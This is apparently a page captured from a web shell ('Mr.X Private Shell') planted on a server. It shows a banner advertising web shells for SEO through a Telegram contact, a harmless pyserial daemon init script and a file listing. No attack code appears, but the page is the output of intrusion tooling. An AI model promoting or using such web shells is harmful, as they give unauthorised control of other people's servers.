__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#! /bin/sh
# daemon starter script
# based on skeleton from Debian GNU/Linux
# cliechti at gmx.net
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/local/bin/port_publisher.py
NAME=port_publisher
DESC="serial port avahi device publisher"
test -f $DAEMON || exit 0
set -e
case "$1" in
start)
echo -n "Starting $DESC: "
$DAEMON --daemon --pidfile /var/run/$NAME.pid
echo "$NAME."
;;
stop)
echo -n "Stopping $DESC: "
start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid
# \ --exec $DAEMON
echo "$NAME."
;;
restart|force-reload)
echo -n "Restarting $DESC: "
start-stop-daemon --stop --quiet --pidfile \
/var/run/$NAME.pid
# --exec $DAEMON
sleep 1
$DAEMON --daemon --pidfile /var/run/$NAME.pid
echo "$NAME."
;;
*)
N=/etc/init.d/$NAME
echo "Usage: $N {start|stop|restart|force-reload}" >&2
exit 1
;;
esac
exit 0
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| at_protocol.py | File | 4.82 KB | 0644 |
|
| port_publisher.py | File | 19.68 KB | 0755 |
|
| port_publisher.sh | File | 1.03 KB | 0755 |
|
| rfc2217_server.py | File | 6 KB | 0755 |
|
| setup-miniterm-py2exe.py | File | 794 B | 0644 |
|
| setup-rfc2217_server-py2exe.py | File | 780 B | 0644 |
|
| setup-wxTerminal-py2exe.py | File | 1 KB | 0644 |
|
| tcp_serial_redirect.py | File | 7.33 KB | 0755 |
|
| wxSerialConfigDialog.py | File | 12.89 KB | 0755 |
|
| wxSerialConfigDialog.wxg | File | 13.29 KB | 0644 |
|
| wxTerminal.py | File | 14.18 KB | 0755 |
|
| wxTerminal.wxg | File | 6.74 KB | 0644 |
|